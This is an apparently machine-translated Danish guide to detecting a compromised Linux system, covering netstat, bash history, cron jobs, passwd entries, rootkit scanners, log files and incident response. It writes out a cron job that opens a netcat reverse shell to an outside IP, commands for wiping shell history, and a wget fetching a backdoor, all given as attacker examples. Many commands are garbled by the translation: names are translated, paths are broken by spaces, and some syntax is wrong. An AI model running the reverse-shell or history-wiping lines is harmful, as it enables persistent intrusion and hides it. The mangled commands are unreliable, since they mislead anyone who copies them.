Sådan afgør du, om et Linux-system er kompromitteret

Der er mange grunde til, at en hacker ville orme sig ind i dit system og forårsage alvorlige problemer. For mange år siden var det måske for at vise sine evner, men i dag kan intentionerne bag sådanne aktiviteter være meget mere komplicerede med meget mere vidtrækkende konsekvenser for offeret. Dette lyder måske åbenlyst, men bare fordi "alt ser ud til at være i orden" betyder det ikke, at alt er i orden. Hackere kan trænge ind i dit system uden at fortælle dig det og inficere det med malware for at tage fuld kontrol og endda til lateral bevægelse blandt systemer. Malwaren kan skjules i systemet og fungerer som en bagdør eller et Command & Control-system for hackere til at udføre ondsindede aktiviteter på dit system.Det er bedre at være sikker end undskyld. Du er måske ikke straks klar over, at dit system er blevet hacket, men der er nogle måder, hvorpå du kan afgøre, om dit system er kompromitteret. Denne artikel vil diskutere, hvordan du kan afgøre, om din Linux systemet er kompromitteret af en uautoriseret person eller en bot logger ind på dit system for at udføre ondsindede aktiviteter.

Netstat

Netstat er et vigtigt TCP / IP-netværksværktøj på kommandolinjen, der giver information og statistik om protokoller i brug og aktive netværksforbindelser.

Vi bruger netstat på et eksempel på offermaskine for at kontrollere noget mistænkeligt i de aktive netværksforbindelser via følgende kommando:

[e-mail-beskyttet]: ~ $ netstat -antp

Her ser vi alle aktuelt aktive forbindelser. Nu vil vi se efter en forbindelse, der ikke skulle være der.

Her er det en aktiv forbindelse på PORT 44999 (en port, som ikke skal være åben).Vi kan se andre detaljer om forbindelsen, f.eks PID, og programnavnet det kører i den sidste kolonne. I dette tilfælde er PID er 1555 og den ondsindede nyttelast, den kører, er ./skal.nisse fil.

En anden kommando til at kontrollere de porte, der aktuelt lytter og er aktive på dit system, er som følger:

[e-mail-beskyttet]: ~ $ netstat -la

Dette er ret rodet output. For at filtrere lytning og etablerede forbindelser ud, bruger vi følgende kommando:

[e-mail-beskyttet]: ~ $ netstat -la | grep “LISTEN” “ESTABLISHED”

Dette giver dig kun de resultater, der betyder noget for dig, så du lettere kan sortere disse resultater. Vi kan se en aktiv forbindelse til havn 44999 i ovenstående resultater.

Efter at have genkendt den ondsindede proces, kan du dræbe processen via følgende kommandoer. Vi vil bemærke PID af processen ved hjælp af netstat-kommandoen, og dræb processen via følgende kommando:

[e-mail-beskyttet]: ~ $ kill 1555

~.bash-historie

Linux registrerer, hvilke brugere der er logget ind på systemet, fra hvilken IP, hvornår og hvor længe.

Du kan få adgang til disse oplysninger med sidst kommando. Output af denne kommando ser ud som følger:

[e-mail-beskyttet]: ~ $ sidste

Outputtet viser brugernavnet i den første kolonne, Terminalen i den anden, kildeadressen i den tredje, login-tiden i den fjerde kolonne og den samlede sessionstid logget i den sidste kolonne. I dette tilfælde brugerne usman og ubuntu er stadig logget ind. Hvis du ser en session, der ikke er autoriseret eller ser skadelig ud, skal du henvise til det sidste afsnit i denne artikel.

Logningshistorikken er gemt i ~.bash-historie fil. Så historikken kan nemt fjernes ved at slette .bash-historie fil. Denne handling udføres ofte af angribere for at dække deres spor.

[e-mail-beskyttet]: ~ $ kat .bash_history

Denne kommando viser de kommandoer, der køres på dit system, med den seneste kommando udført nederst på listen.

Historikken kan ryddes via følgende kommando:

[e-mail beskyttet]: ~ $ historie -c

Denne kommando sletter kun historikken fra den terminal, du bruger i øjeblikket. Så der er en mere korrekt måde at gøre dette på:

[e-mail-beskyttet]: ~ $ cat / dev / null> ~ /.bash_history

Dette rydder historiens indhold, men holder filen på plads. Så hvis du kun ser dit nuværende login efter at have kørt sidst kommando, dette er slet ikke et godt tegn. Dette indikerer, at dit system muligvis er kompromitteret, og at angriberen sandsynligvis slettede historikken.

Hvis du har mistanke om en ondsindet bruger eller IP, skal du logge ind som den bruger og køre kommandoen historie, som følger:

[e-mail-beskyttet]: ~ $ su
[e-mail-beskyttet]: ~ $ historie

Denne kommando viser kommandohistorikken ved at læse filen .bash-historie i /hjem mappen til den bruger. Se omhyggeligt efter wget, krølle, eller netcat kommandoer, hvis angriberen brugte disse kommandoer til at overføre filer eller til at installere ud af repo-værktøjer, såsom krypto-minearbejdere eller spam-bots.

Se eksemplet nedenfor:

Ovenfor kan du se kommandoen “wget https: // github.com / sajith / mod-rootme.” I denne kommando forsøgte hacker at få adgang til en fil uden for repo ved hjælp af wget for at downloade en bagdør kaldet “mod-root me” og installere den på dit system. Denne kommando i historien betyder, at systemet er kompromitteret og er blevet baguddækket af en angriber.

Husk, denne fil kan let udvises eller dens stof produceres. De data, der gives med denne kommando, må ikke betragtes som en bestemt realitet. I tilfælde af at angriberen kørte en "dårlig" kommando og forsømte at evakuere historien, vil den være der.

Cron Jobs

Cron-job kan fungere som et vigtigt værktøj, når de er konfigureret til at oprette en omvendt skal på angribermaskinen. Redigering af cron-job er en vigtig færdighed, og det er også at vide, hvordan man ser dem.

For at se cron-job, der kører for den aktuelle bruger, bruger vi følgende kommando:

[e-mail-beskyttet]: ~ $ crontab -l

For at se cron-job, der kører for en anden bruger (i dette tilfælde Ubuntu), bruger vi følgende kommando:

[e-mail-beskyttet]: ~ $ crontab -u ubuntu -l

For at se daglige, timelige, ugentlige og månedlige cron-job bruger vi følgende kommandoer:

Daglige Cron Jobs:

[e-mail-beskyttet]: ~ $ ls -la / etc / cron.daglige

Cron-job hver time:

[e-mail-beskyttet]: ~ $ ls -la / etc / cron.hver time

Ugentlige Cron Jobs:

[e-mail-beskyttet]: ~ $ ls -la / etc / cron.ugentlig

Tag et eksempel:

Angriberen kan sætte et cron-job i / etc / crontab der kører en ondsindet kommando 10 minutter hver time. Angriberen kan også køre en ondsindet tjeneste eller en omvendt shell bagdør via netcat eller et andet hjælpeprogram. Når du udfører kommandoen $ ~ crontab -l, du vil se et cron-job, der kører under:

[e-mail-beskyttet]: ~ $ crontab -l
CT = $ (crontab -l)
CT = $ CT $ '\ n10 * * * * nc -e / bin / bash 192.168.8.131 44999 '
printf "$ CT" | crontab -
ps aux

For korrekt inspektion af, om dit system er kompromitteret, er det også vigtigt at se kørende processer. Der er tilfælde, hvor nogle uautoriserede processer ikke bruger nok CPU-brug til at blive opført i top kommando. Det er her, vi vil bruge ps kommando for at vise alle aktuelt kørende processer.

[e-mail-beskyttet]: ~ $ ps auxf

Den første kolonne viser brugeren, den anden kolonne viser et unikt proces-id, og CPU- og hukommelsesforbrug vises i de næste kolonner.

Denne tabel giver dig mest information. Du bør inspicere enhver kørende proces for at se efter noget særligt at vide, om systemet er kompromitteret eller ej. I tilfælde af at du finder noget mistænkeligt, skal du Google det eller køre det med lsof som vist ovenfor. Dette er en god vane at løbe ps kommandoer på din server, og det øger dine chancer for at finde noget mistænkeligt eller uden for din daglige rutine.

/ etc / passwd

Det / etc / passwd fil holder styr på hver bruger i systemet. Dette er en kolon-adskilt fil, der indeholder oplysninger som brugernavn, bruger-id, krypteret adgangskode, GroupID (GID), brugerens fulde navn, brugerens hjemmekatalog og login-shell.

Hvis en hacker hacker ind i dit system, er der en mulighed for, at han eller hun vil oprette nogle flere brugere, for at holde tingene adskilt eller for at oprette en bagdør i dit system for at komme tilbage ved hjælp af den bagdør. Mens du kontrollerer, om dit system er kompromitteret, skal du også kontrollere hver bruger i filen / etc / passwd. Skriv følgende kommando for at gøre det:

[e-mail-beskyttet]: ~ $ cat etc / passwd

Denne kommando giver dig en output svarende til nedenstående:

gnome-initial-opsætning: x: 120: 65534 :: / run / gnome-initial-setup /: / bin / false
gdm: x: 121: 125: Gnome Display Manager: / var / lib / gdm3: / bin / false
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash
debian-tor: x: 123: 129 :: / var / lib / tor: / bin / false
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
lightdm: x: 125: 132: Light Display Manager: / var / lib / lightdm: / bin / false
Debian-gdm: x: 124: 131: Gnome Display Manager: / var / lib / gdm3: / bin / false
anonym: x: 1002: 1002: ,,,: / hjem / anonym: / bin / bash

Nu vil du gerne søge efter enhver bruger, som du ikke er opmærksom på. I dette eksempel kan du se en bruger i filen med navnet “anonym.”En anden vigtig ting at bemærke er, at hvis angriberen oprettede en bruger til at logge ind igen med, vil brugeren også få tildelt en“ / bin / bash ”shell. Så du kan indsnævre din søgning ved at gribe følgende output:

[e-mail-beskyttet]: ~ $ cat / etc / passwd | grep -i "/ bin / bash"
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
anonym: x: 1002: 1002: ,,,: / hjem / anonym: / bin / bash

Du kan udføre yderligere "bash-magi" for at finjustere dit output.

[e-mail-beskyttet]: ~ $ cat / etc / passwd | grep -i "/ bin / bash" | klippe -d ":" -f 1
usman
postgres
ubuntu
anonym

Finde

Tidsbaserede søgninger er nyttige til hurtig triage. Brugeren kan også ændre tidsstempler for filændring. For at forbedre pålideligheden skal du medtage ctime i kriterierne, da det er meget sværere at manipulere med, fordi det kræver ændringer af nogle niveaufiler.

Du kan bruge følgende kommando til at finde filer, der er oprettet og ændret inden for de sidste 5 dage:

[e-mail-beskyttet]: ~ $ find / -mtime -o -ctime -5

For at finde alle SUID-filer, der ejes af roden, og for at kontrollere, om der er uventede poster på listerne, bruger vi følgende kommando:

[e-mail-beskyttet]: ~ $ find / -perm -4000 -brugerrod -type f

For at finde alle SGID-filer (sæt bruger-ID), der ejes af roden, og kontrollere, om der er uventede poster på listerne, bruger vi følgende kommando:

[e-mail-beskyttet]: ~ $ find / -perm -6000 -type f

Chkrootkit

Rootkits er en af de værste ting, der kan ske med et system, og er et af de farligste angreb, farligere end malware og vira, både i den skade, de forårsager systemet og vanskeligheder med at finde og opdage dem.

De er designet på en sådan måde, at de forbliver skjulte og gør ondsindede ting som at stjæle kreditkort og onlinebankinformation. Rootkits give cyberkriminelle mulighed for at kontrollere dit computersystem. Rootkits hjælper også angriberen med at overvåge dine tastetryk og deaktivere din antivirussoftware, hvilket gør det endnu nemmere at stjæle dine private oplysninger.

Disse typer malware kan forblive på dit system i lang tid uden at brugeren selv bemærker det og kan forårsage alvorlig skade. En gang Rootkit registreres, er der ingen anden måde end at geninstallere hele systemet. Nogle gange kan disse angreb endda forårsage hardwarefejl.

Heldigvis er der nogle værktøjer, der kan hjælpe med at opdage Rootkits på Linux-systemer, såsom Lynis, Clam AV eller LMD (Linux Malware Detect). Du kan kontrollere dit system for kendt Rootkits ved hjælp af nedenstående kommandoer.

Først skal du installere Chkrootkit via følgende kommando:

[e-mail-beskyttet]: ~ $ sudo apt installer chkrootkit

Dette vil installere Chkrootkit værktøj. Du kan bruge dette værktøj til at kontrollere Rootkits via følgende kommando:

[e-mail-beskyttet]: ~ $ sudo chkrootkit

Chkrootkit-pakken består af et shell-script, der kontrollerer systembinarier for rootkit-modifikation samt flere programmer, der kontrollerer for forskellige sikkerhedsproblemer. I ovenstående tilfælde kontrollerede pakken for et tegn på Rootkit på systemet og fandt ingen. Nå, det er et godt tegn!

Linux-logfiler

Linux-logfiler giver en tidsplan for begivenheder i Linux-arbejdsrammen og applikationer og er et vigtigt efterforskningsinstrument, når du oplever problemer. Den primære opgave, som en administrator skal udføre, når han eller hun finder ud af, at systemet er kompromitteret, skal dissekere alle logposter.

For eksplicitte problemer i arbejdsområdet anvendes logoptegnelser i kontakt med forskellige områder. For eksempel komponerer Chrome nedbrudsrapporter til '~ /.krom / crash rapporter '), hvor et arbejdsområdeapplikation sammensætter logfiler, der er afhængige af ingeniøren, og viser, om applikationen tager højde for brugerdefineret logindretning. Optegnelser findes i/ var / log vejviser. Der er Linux-logfiler til alt: ramme, del, bundthøvdinger, opstartsformularer, Xorg, Apache og MySQL. I denne artikel koncentreres temaet eksplicit om Linux-rammelogfiler.

Du kan skifte til dette katalog ved hjælp af CD-rækkefølgen. Du skal have rodtilladelser til at se eller ændre logfiler.

[e-mail-beskyttet]: ~ $ cd / var / log

Instruktioner til at se Linux-logfiler

Brug følgende kommandoer til at se de nødvendige logdokumenter.

Linux-logfiler kan ses med kommandoen cd / var / log, på det tidspunkt ved at komponere ordren for at se logfiler lagt under dette katalog. En af de mest betydningsfulde logfiler er syslog, der logger mange vigtige logfiler.

ubuntu @ ubuntu: kat syslog

For at desinficere output bruger vi “mindre" kommando.

ubuntu @ ubuntu: kat syslog | mindre

Skriv kommandoen var / log / syslog at se en hel del ting under syslog-fil. Fokus på et bestemt emne vil tage noget tid, da denne post normalt vil være lang. Tryk på Shift + G for at rulle ned i posten til END, betegnet med “END.”

Du kan også se logfiler ved hjælp af dmesg, der udskriver delringens understøttelse. Denne funktion udskriver alt og sender dig så langt som muligt langs dokumentet. Fra det tidspunkt kan du bruge ordren dmesg | mindre at se igennem udbyttet. I tilfælde af at du har brug for at se logfilerne for den givne bruger, skal du køre følgende kommando:

dmesg - facilitet = bruger

Afslutningsvis kan du bruge halen for at se logdokumenterne. Det er et lille, men nyttigt værktøj, man kan bruge, da det bruges til at vise den sidste del af logfiler, hvor problemet sandsynligvis opstod. Du kan også angive antallet af sidste byte eller linjer, der skal vises i halen-kommandoen. Til dette skal du bruge kommandoen hale / var / log / syslog. Der er mange måder at se på logfiler.

For et bestemt antal linjer (modellen betragter de sidste 5 linjer), skal du indtaste følgende kommando:

[e-mail-beskyttet]: ~ $ tail -f -n 5 / var / log / syslog

Dette udskriver de seneste 5 linjer. Når en ny linje kommer, vil den tidligere blive evakueret. For at komme væk fra haleordren skal du trykke på Ctrl + X.

Vigtige Linux-logfiler

De primære fire Linux-logfiler inkluderer:

Applikationslogfiler
Hændelseslogfiler
Servicelogfiler
Systemlogfiler

ubuntu @ ubuntu: kat syslog | mindre

/ var / log / syslog eller / var / log / beskeder: generelle meddelelser, ligesom rammerelaterede data. Denne log gemmer alle handlingsoplysninger over den verdensomspændende ramme.

ubuntu @ ubuntu: cat auth.log | mindre

/ var / log / godkendelse.log eller / var / log / sikker: gemme verifikationslogfiler, herunder både effektive og fizzled logins og valideringsstrategier. Brug af Debian og Ubuntu / var / log / godkendelse.log til at gemme loginforsøg, mens Redhat og CentOS bruger / var / log / sikker for at gemme godkendelseslogfiler.

ubuntu @ ubuntu: katstøvle.log | mindre

/ var / log / boot.log: indeholder information om opstart og meddelelser under opstart.

ubuntu @ ubuntu: cat maillog | mindre

/ var / log / maillog eller / var / log / mail.log: gemmer alle logfiler, der er identificeret med mailservere; værdifuldt, når du har brug for data om postfix, smtpd eller andre e-mail-relaterede administrationer, der kører på din server.

ubuntu @ ubuntu: katkerne | mindre

/ var / log / kern: indeholder info om kernelogfiler. Denne log er vigtig for at undersøge brugerdefinerede dele.

ubuntu @ ubuntu: kat dmesg | mindre

/ var / log / dmesg: indeholder beskeder, der identificerer gadgetdrivere. Ordren dmesg kan bruges til at se meddelelser i denne post.

ubuntu @ ubuntu: cat faillog | mindre

/ var / log / faillog: indeholder data om alle fizzled loginforsøg, værdifulde til at samle viden om forsøg på sikkerhedspenetrationer; for eksempel dem, der søger at hacke logincertificeringer, ligesom angreb på dyremagt.

ubuntu @ ubuntu: kat cron | mindre

/ var / log / cron: gemmer alle Cron-relaterede meddelelser; cron-beskæftigelser, for eksempel eller når cron-dæmonen startede et kald, relaterede skuffelsesbeskeder osv.

ubuntu @ ubuntu: cat yum.log | mindre

/ var / log / yum.log: hvis du introducerer bundter ved hjælp af yum-rækkefølgen, gemmer denne log alle relaterede data, hvilket kan være nyttigt at afgøre, om en pakke og alle segmenter effektivt blev introduceret.

ubuntu @ ubuntu: kat httpd | mindre

/ var / log / httpd / eller / var / log / apache2: disse to mapper bruges til at gemme alle typer logfiler til en Apache HTTP-server, inklusive adgangslogger og fejllogfiler. Error_log-filen indeholder alle dårlige anmodninger modtaget af http-serveren. Disse fejl indeholder hukommelsesproblemer og andre rammerelaterede fejl. Access_log indeholder en registrering af alle anmodninger modtaget via HTTP.

ubuntu @ ubuntu: cat mysqld.log | mindre

/ var / log / mysqld.log eller/ var / log / mysql.log : MySQL-logdokumentet, der logger alle fejl-, fejlretnings- og succesmeddelelser. Dette er en anden begivenhed, hvor rammen dirigerer til registreringsdatabasen; RedHat, CentOS, Fedora og andre RedHat-baserede rammer bruger / var / log / mysqld.log, mens Debian / Ubuntu bruger / var / log / mysql.logkatalog.

Værktøjer til visning af Linux-logfiler

Der er mange open source-logsporere og undersøgelsesenheder tilgængelige i dag, hvilket gør det lettere at vælge de rigtige aktiver til handlingslogfiler, end du måske har mistanke om. De gratis og open source logbrikker kan arbejde på ethvert system for at få arbejdet gjort. Her er fem af de bedste, jeg har brugt i fortiden, uden nogen bestemt rækkefølge.

GRÅLOG

Startet i Tyskland i 2011 tilbydes nu Graylog som enten en open source-enhed eller et forretningsarrangement. Graylog er beregnet til at være en samlet logbog-ramme, der modtager informationsstrømme fra forskellige servere eller slutpunkter og giver dig mulighed for hurtigt at gennemgå eller nedbryde disse data.

Graylog har samlet en positiv berygtelse blandt rammehoveder som et resultat af dets enkelhed og alsidighed. De fleste webforetagender starter lidt, men kan alligevel udvikle sig eksponentielt. Graylog kan justere stakke over et system med backend-servere og håndtere et par terabyte logoplysninger hver dag.

IT-formænd vil se frontenden af GrayLog-grænsefladen så enkel at bruge og energisk i sin anvendelighed. Graylog arbejder omkring ideen om dashboards, som giver brugerne mulighed for at vælge den type målinger eller informationskilder, de finder vigtige og hurtigt observere stigninger efter nogen tid.

Når en sikkerheds- eller udførelsesepisode opstår, skal it-formændene have mulighed for at følge manifestationerne til en underliggende driver så hurtigt som det med rimelighed kunne forventes. Graylogs søgefunktion gør denne opgave enkel. Dette værktøj har arbejdet med tilpasning til intern fiasko, der kan køre multistrenge ventures, så du sammen kan nedbryde et par potentielle farer.

NAGIOS

Startet af en enkelt udvikler i 1999, har Nagios siden avanceret til et af de mest solide open source-instrumenter til overvågning af logoplysninger. Den nuværende gengivelse af Nagios kan implementeres på servere, der kører enhver form for operativsystem (Linux, Windows osv.).

Nagios 'essentielle element er en log-server, der strømliner informationssortiment og gør data gradvis tilgængelige for rammeledere. Nagios log-servermotoren vil gradvis fange oplysninger og føde dem til et banebrydende søgeinstrument. At inkorporere med et andet slutpunkt eller et andet program er en simpel drikkepenge til denne iboende ordningsguide.

Nagios bruges ofte i foreninger, der har brug for at screene sikkerheden i deres kvarterer og kan gennemgå en række systemrelaterede lejligheder for at hjælpe med at robotisere formidlingen af advarsler. Nagios kan programmeres til at udføre specifikke opgaver, når en bestemt betingelse er opfyldt, hvilket giver brugerne mulighed for at opdage problemer, selv før et menneskes behov er inkluderet.

Som et vigtigt aspekt af systemevaluering kanaliserer Nagios logoplysninger afhængigt af det geografiske område, hvor det starter. Komplette dashboards med kortlægningsinnovation kan implementeres for at se streaming af webtrafik.

LOGALYSER

Logalyze fremstiller open source-værktøjer til rammedirektører eller sys-admins og sikkerhedsspecialister for at hjælpe dem med at føre tilsyn med serverlogfiler og lade dem fokusere på at omdanne logfiler til værdifuld information. Dette værktøjs vigtigste element er, at det er tilgængeligt som en gratis download til enten hjemmet eller virksomheden.

Hvad skal du gøre, hvis du er kompromitteret?

Det vigtigste er ikke at gå i panik, især hvis den uautoriserede person er logget ind lige nu. Du skal have mulighed for at tage kontrol over maskinen tilbage, før den anden person ved, at du kender dem. I tilfælde af at de ved, at du er opmærksom på deres tilstedeværelse, kan angriberen muligvis holde dig ude af din server og begynde at ødelægge dit system. Hvis du ikke er så teknisk, skal du bare lukke hele serveren med det samme. Du kan lukke serveren via følgende kommandoer:

[e-mail-beskyttet]: ~ $ nedlukning -h nu

Eller

[e-mail-beskyttet]: ~ $ systemctl poweroff

En anden måde at gøre dette på er ved at logge ind på din hostingudbyders kontrolpanel og lukke det derfra. Når serveren er slukket, kan du arbejde på de firewallregler, der er nødvendige, og konsultere alle om hjælp i din egen tid.

Hvis du føler dig mere selvsikker, og din hostingudbyder har en upstream-firewall, skal du oprette og aktivere følgende to regler:

Tillad kun SSH-trafik fra din IP-adresse.
Bloker alt andet, ikke kun SSH men alle protokoller, der kører på hver port.

Brug følgende kommando for at kontrollere for aktive SSH-sessioner:

[e-mail-beskyttet]: ~ $ ss | grep ssh

Brug følgende kommando til at dræbe deres SSH-session:

[e-mail-beskyttet]: ~ $ kill

Dette vil dræbe deres SSH-session og give dig adgang til serveren. Hvis du ikke har adgang til en upstream-firewall, skal du oprette og aktivere firewallreglerne på selve serveren. Derefter, når firewallreglerne er oprettet, skal du dræbe den uautoriserede brugers SSH-session via kommandoen “kill”.

En sidste teknik, hvis tilgængelig, logger på serveren ved hjælp af en out-of-band-forbindelse, såsom en seriel konsol. Stop al netværk via følgende kommando:

[e-mail-beskyttet]: ~ $ systemctl stop netværk.service

Dette stopper fuldstændigt ethvert system fra at komme til dig, så du vil nu være i stand til at aktivere firewall-kontrollerne på din egen tid.

Når du genvinder kontrollen over serveren, skal du ikke stole på den. Forsøg ikke at ordne tingene og genbruge dem. Hvad der er brudt kan ikke ordnes. Du ville aldrig vide, hvad en angriber kunne gøre, og så skulle du aldrig være sikker på, at serveren er sikker. Så geninstallation skal være dit sidste trin.